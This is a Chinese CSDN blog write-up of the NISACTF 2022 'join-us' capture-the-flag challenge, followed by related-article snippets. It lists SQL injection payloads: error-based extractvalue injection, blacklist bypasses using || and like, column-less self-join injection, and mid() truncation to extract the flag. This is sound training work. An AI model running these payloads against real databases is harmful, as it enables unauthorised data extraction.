【[NISACTF 2022]join-us

最新推荐文章于 2024-02-25 20:31:30 发布
最新推荐文章于 2024-02-25 20:31:30 发布
阅读量815 收藏 1
点赞数
分类专栏: web渗透 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40567274/article/details/124048763
版权

[NISACTF 2022]

题源:https://www.ctfer.vip/#/problem/2034

题目:join-us

-1' || (select*from ANTONIE)#

-1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#

-1' || extractvalue(1,concat(0x5c,(select*from (select*from output a join output b)c)))#

-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#

-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#

总结

所用知识点:
注入检测fuzz;
黑名单绕过(‘||’、extractvalue、like);sys应该也可但没试
无列名注入;
sql中mid函数截取。

Antonie Snow
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NISACTF 2022]join-us - 报错注入&无列名注入
oZuoShen123的博客
10-06 569
这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了 1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()# 或 1' || (select * from aa)#   FUNCTION sqlsql.a does not exist 2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#   没拦截,说明可以试一下
Flink Sql双流join-回撤机制导致数据重复
mtj66的博客,交流WX:SpringBreeze1104
10-12 2990
数据源:kafka topic数据类型为json 业务场景:解析json,由于数据层级比较深,而且包含数组,此处键值可能为空 所以数据就变成了双流join,甚至是多流join。 问题原因:采用left join导致数据回撤,然后同一个主键数据产生重复 是采用inner join 还是 outer join,具体区别见Flink Sql教程(5)_狄杰的博客-CSDN博客_connector.startup-mode 由于此处关联可能存在键值为空匹配不到的情况,采用了很多left join,..
[NISACTF 2022]
snowlyzz的博客
09-09 6166
NISACTF部分WP
[NISACTF 2022]join-us
m0_70819573的博客
03-14 264
其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。接下来column被ban了,所以用无列注入,join题目也有提示。进入登录界面,发现sql注入窗口,首先进行fuzz测试。最后用mid或reverse函数读取flag。爆出表Fal_flag,output。
[NISACTF 2022]下
qq_62046696的博客
07-30 2604
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]join-us 无列名注入 过滤database() 报错获取表名 字段名
m0_64180167的博客
10-31 180
又是sql注入来做一些吧 这里我们可以很快就获取注入点抓包开干开fuzz过滤很多东西哦 database都过滤了 那么要咋弄啊。。。
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
(word完整版)join-in-英语六年级下学期单元总结,推荐文档.docx.pdf
10-10
(word完整版)join-in-英语六年级下学期单元总结,推荐文档.docx.pdf
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4817
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
[NISACTF 2022]ezpython
weixin_61154173的博客
10-31 765
re简单题
join-text:将两个文本合并成列
05-19
连接文本 将两个文本合并成列。 安装 $ npm install --save join-text 用法 var joinText = require ( 'join-text' ) ; joinText ( 'left side text.\nthis text will be' , 'concatenated with\nthe right text.' , { paddingRight : 2 } ) ; //=> Result: left side text . concatenated with this text will be the right text . 原料药 joinText(左,右,[选项]) 剩下 必需的类型: string 左侧文字。 正确的 必需的类型: string 右侧文字。 选项 垂直对齐 类型: string 默认值: top
[NISACTF 2022]checkin
m0_60716947的博客
10-18 1193
010 editor使用
pwn旅行之[NISACTF 2022]ezpie
最新发布
qq_66013948的博客
02-25 513
​ PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。​ 简单地说就是地址随机化。
[NISACTF 2022]ReorPwn?
weixin_61995249的博客
05-21 288
假设输入a为abcd,进入fun函数之后,逻辑如下。
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2446
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4858
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
SQL进阶学习
十一.的博客
11-21 640
因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用。
NSSCTF web学习
akxnxbshai的博客
09-30 1252
NSSCTF web刷题
优化代码SELECT SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 1, 1, 0)) AS new_customer_count, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 0, 1, 0)) AS old_customer_count, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 1, payment_amount, 0)) AS new_customer_payment_amount, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 0, payment_amount, 0)) AS old_customer_payment_amount, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'A', 1, 0)) AS category_A_customer_count, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'A', payment_amount, 0)) AS category_A_payment_amount, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'B', 1, 0)) AS category_B_customer_count, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'B', payment_amount, 0)) AS category_B_payment_amount, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND product_id = 'P1', 1, 0)) AS product_P1_customer_count, SUM(IF(order_date BETWEEN '2022-10-31' AND '2022-11-11' AND product_id = 'P1', payment_amount, 0)) AS product_P1_payment_amount FROM orders o LEFT JOIN (SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11') d1 ON o.order_date = d1.order_date LEFT JOIN (SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2021-10-31' AND '2022-10-30' AND order_date NOT IN (SELECT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11')) d2 ON o.order_date = d2.order_date LEFT JOIN (SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2021-11-12' AND '2022-10-30' AND order_date IN (SELECT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11')) d3 ON o.order_date = d3.order_date WHERE d1.order_date IS NOT NULL OR d2.order_date IS NOT NULL OR d3.order_date IS NOT NULL;
05-25
这个 SQL 查询语句的复杂度比较高,可以尝试进行以下优化: 1. 避免使用子查询:可以将重复使用的子查询转化为临时表,并使用 JOIN 进行连接,以减少重复计算。 2. 使用索引:可以在 order_date、is_new_customer、category 和 product_id 字段上创建索引,以加快查询速度。 3. 减少 IF 函数的使用:可以使用 CASE WHEN 语句替换 IF 函数,以提高查询效率。 4. 缩短时间范围:如果数据量较大,可以缩短查询的时间范围,以减少计算量。 5. 分批次查询:如果数据量非常大,可以将查询分成多个批次进行,以避免内存溢出。 综上所述,可以将查询语句进行如下优化: ``` CREATE TEMPORARY TABLE temp_orders AS SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11'; CREATE TEMPORARY TABLE temp_orders1 AS SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2021-10-31' AND '2022-10-30' AND order_date NOT IN ( SELECT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11' ); CREATE TEMPORARY TABLE temp_orders2 AS SELECT DISTINCT order_date FROM orders WHERE order_date BETWEEN '2021-11-12' AND '2022-10-30' AND order_date IN ( SELECT order_date FROM orders WHERE order_date BETWEEN '2022-10-31' AND '2022-11-11' ); SELECT SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 1 THEN 1 ELSE 0 END) AS new_customer_count, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 0 THEN 1 ELSE 0 END) AS old_customer_count, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 1 THEN payment_amount ELSE 0 END) AS new_customer_payment_amount, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND is_new_customer = 0 THEN payment_amount ELSE 0 END) AS old_customer_payment_amount, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'A' THEN 1 ELSE 0 END) AS category_A_customer_count, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'A' THEN payment_amount ELSE 0 END) AS category_A_payment_amount, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'B' THEN 1 ELSE 0 END) AS category_B_customer_count, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND category = 'B' THEN payment_amount ELSE 0 END) AS category_B_payment_amount, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND product_id = 'P1' THEN 1 ELSE 0 END) AS product_P1_customer_count, SUM(CASE WHEN o.order_date BETWEEN '2022-10-31' AND '2022-11-11' AND product_id = 'P1' THEN payment_amount ELSE 0 END) AS product_P1_payment_amount FROM orders o LEFT JOIN temp_orders d1 ON o.order_date = d1.order_date LEFT JOIN temp_orders1 d2 ON o.order_date = d2.order_date LEFT JOIN temp_orders2 d3 ON o.order_date = d3.order_date WHERE d1.order_date IS NOT NULL OR d2.order_date IS NOT NULL OR d3.order_date IS NOT NULL; ``` 这样可以减少重复计算,使用 CASE WHEN 语句替换 IF 函数,同时避免了多次查询子查询的操作。同时,如果数据量较大,可以缩小查询时间范围,或者分批次查询,以减少内存使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值